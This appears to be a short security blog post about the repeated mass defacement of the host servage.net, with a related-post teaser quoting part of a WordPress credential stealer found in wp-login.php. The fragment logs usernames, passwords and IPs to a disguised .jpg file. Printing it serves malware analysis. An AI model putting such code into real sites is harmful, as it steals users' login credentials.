servage.net mass defaced again

It seems that http://www.servage.net/ has been mass defaced again. It is not the first time I hear about them, but it seems they get hacked way too often.

My suggestion: Host your pages on private/dedicated servers (some are as cheap as 29,99 per month). I mean, if you care about your site/blog…

3 comments

Comments are closed.

You May Also Like

Simple WP login stealer

We recently found the following malicious code injected into wp-login.php on multiple compromised websites. \ } // End of login_header() $username_password=$_POST[‘log’].”—-xxxxx—-“.$_POST[‘pwd’].”ip:”.$_SERVER[‘REMOTE_ADDR’].$time = time().”\r\n”; $hellowp=fopen(‘./wp-content/uploads/2018/07/[redacted].jpg’,’a+’); $write=fwrite($hellowp,$username_password,$time);…
Read the Post